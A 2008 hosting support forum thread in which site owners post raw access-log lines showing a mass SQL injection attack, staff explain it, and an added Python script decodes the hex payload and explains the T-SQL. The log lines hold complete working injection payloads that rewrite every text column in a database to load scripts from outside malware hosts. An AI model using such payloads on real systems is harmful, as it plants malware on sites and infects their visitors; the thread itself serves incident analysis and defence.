carbonize Posted August 22, 2008

I was going through my error logs and noticed some alerts, so I downloaded my raw log. I found the following entries (there were more, but I'll only post one in full and one truncated). So I'm guessing there is an exploit in an old version of either PHP or Apache, but can anyone shed any light on it? I have blocked the 2 main IPs using htaccess for now.

ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343 <snip> C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
TCH-Dick Posted August 22, 2008

This is a common form of SQL injection and is not really related to Apache or PHP. This can be accomplished in any scripting language if the script is not validating user input. This particular attack is attempting to insert code that allows an external script to load in a frame on the site, which is then used for things like redirecting the visitor or infecting their machine. If you convert everything in parentheses for CAST from hex to ASCII, you can see the SQL query used. This will give you some idea of what they were attempting and if it affected your database. We will take this information and add the appropriate rules to our servers to help prevent these attacks.
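What the hex decodes to, as an added example that is not part of the thread or of TCH's own tooling: a small Python script that parses the first log line carbonize posted (the request path is reproduced with the forum's line-wrapping whitespace removed from the hex), URL-decodes the query string, converts the CAST(0x...) blob back into the T-SQL it carries, and lists the script URLs that SQL injects. It goes slightly beyond the samples in the thread by also handling the NVARCHAR form of the same trick, where the hex is UTF-16LE rather than ASCII. The regex group names and function names are this example's own choices.

```python
"""Decode the hex-encoded T-SQL in a CAST(0x...)-style SQL injection log line.

Added example, not code from the thread: parse an Apache combined-format access
log line, URL-decode the query string, pull the hex out of CAST(0x... AS CHAR(n)),
and turn it back into the SQL the attacker wanted executed, plus the
<script src="..."> URLs it would write into the database.
"""
import re
import urllib.parse

# Apache "combined" log format. Group names are this example's own choice.
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# CAST(0x<hex> AS CHAR/VARCHAR/NCHAR/NVARCHAR(...)), matched after URL-decoding.
# An N-prefixed target type means the hex is UTF-16LE instead of one byte per char.
CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+(?P<n>N)?(?:VAR)?CHAR", re.I
)

SCRIPT_SRC = re.compile(r'<script\s+src="([^"]+)"', re.I)

# The first log line from the thread; only the whitespace that line wrapping
# inserted into the hex has been removed.
SAMPLE_LOG_LINE = (
    'ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] '
    '"GET /Old/Yahoo/archive.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
    '4445434C415245204054207661726368617228323535292C4043207661726368617228343'
    '0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374'
    '20612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73'
    '206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78'
    '747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78'
    '747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D'
    '20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535441'
    '5455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40'
    '432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31'
    '303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B4043'
    '2B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372'
    '697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A7322'
    '3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4375'
    '72736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C'
    '4C4F43415445205461626C655F437572736F72'
    '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9659 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; '
    '.NET CLR 1.1.4322; Media Center PC 4.0)"'
)


def decode_cast_payload(raw_query):
    """Return the SQL hidden in CAST(0x... AS [N][VAR]CHAR), or None if absent."""
    decoded = urllib.parse.unquote(raw_query)
    m = CAST_HEX.search(decoded)
    if m is None:
        return None
    blob = bytes.fromhex(m.group("hex"))
    encoding = "utf-16-le" if m.group("n") else "latin-1"
    return blob.decode(encoding, errors="replace")


def analyse(line):
    """Parse one access-log line and decode any hex CAST injection in its query."""
    m = COMBINED.match(line)
    if m is None:
        raise ValueError("not a combined-format log line")
    script, _, query = m.group("path").partition("?")
    sql = decode_cast_payload(query) if query else None
    return {
        "host": m.group("host"),
        "status": int(m.group("status")),
        "script": script,
        "sql": sql,
        # The same URL appears twice in the payload; report each one once.
        "script_urls": sorted(set(SCRIPT_SRC.findall(sql))) if sql else [],
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG_LINE)
    print(result["sql"])
    print("injected:", result["script_urls"])
```

Run against the thread's line, the decoded statement opens a cursor over `sysobjects`/`syscolumns` for every column of user tables (`a.xtype='u'`) whose type is `ntext` (99), `text` (35), `nvarchar` (231) or `varchar` (167), and for each one runs `update [table] set [column]='"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'+[column]`, skipping rows already tagged. That is Microsoft SQL Server syntax throughout (`sysobjects`, `@@FETCH_STATUS`, `EXEC(@S)`), so on a PHP-plus-MySQL site the statement cannot even parse; the `200` in the access log only says the PHP script returned a page, not that the query ran. To confirm nothing was written, search text columns in the database for the `</title><script src=` string rather than trusting the status code.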
carbonize Posted August 22, 2008

Your servers blocked the attack anyway because the GET was too long. This is how I discovered them, because they were in the error log.
atmospheresinking Posted October 8, 2008

I'm getting these as well.

http://atmospheresinking.com/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);